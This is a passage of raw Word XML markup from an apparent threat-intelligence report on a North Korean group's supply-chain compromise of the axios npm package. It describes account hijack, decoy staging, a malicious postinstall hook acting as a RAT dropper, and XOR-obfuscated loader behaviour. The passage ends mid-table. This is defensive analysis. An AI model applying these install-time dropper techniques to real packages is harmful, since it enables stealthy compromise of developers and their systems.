          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sapphire Sleet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, a North Korean state-sponsored threat actor active since at least March 2020. Sapphire Sleet primarily targets the finance sector such as cryptocurrency exchanges, venture capital firms, and blockchain organizations, with the objective of stealing cryptocurrency wallets and technology-related intellectual property to generate revenue for the North Korean regime. The group is also tracked by other security vendors as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UNC1069</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>STARDUST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CHOLLIMA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Alluring Pisces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BlueNoroff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CageyChameleon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CryptoCore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA38" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="280" w:after="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.2 Attack Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA39" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dependency insertion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than direct code modification, a technique Microsoft characterizes as "silent install-time code execution":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA3A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Account hijack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attacker compromised the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> account of "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>jasonsaayman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">" a legitimate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> maintainer through a sophisticated and intricate social engineering campaign. The account email was changed to a Proton Mail address (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>ifstap@proton.me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA3B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Decoy staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A clean package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>plain-crypto-js@4.2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> was published approximately 18 hours before the malicious version to establish publishing history and reduce scrutiny.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA3C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Malicious dependency injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attacker published </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>plain-crypto-js@4.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, which added a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>postinstall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> lifecycle hook (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>postinstall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>": "node setup.js"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) serving as the RAT dropper. Two </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> releases, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>0.30.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, were then published with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>manifest-only change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: adding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>plain-crypto-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>@^4.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a dependency while leaving all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> source code unchanged; bit-for-bit identical with the respective immediately preceding version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA3D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Differentiation from legitimate publishing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft notes that the publication metadata for the malicious versions "differs from the project's normal CI-backed publishing pattern (for example, missing trusted publisher binding and missing corresponding repo tag/commit trail for the malicious version)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA3E" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.3 The Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA3F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="280" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>First-Stage Loader (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>setup.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA40" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>postinstall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> script uses layered obfuscation (XOR cipher with key “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>OrDeR_7077</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> + base64 encoding) to reconstruct sensitive strings at runtime. It identifies the host platform and connects to the C2 server to fetch the platform-specific second-stage RAT. The OS selection is conveyed through POST body identifiers:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6930" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1979"/>
        <w:gridCol w:w="4951"/>
      </w:tblGrid>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA43" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="197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41" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="495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42" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>POST Body Identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA46" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="197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44" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>MacOS (Darwin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="495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45" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
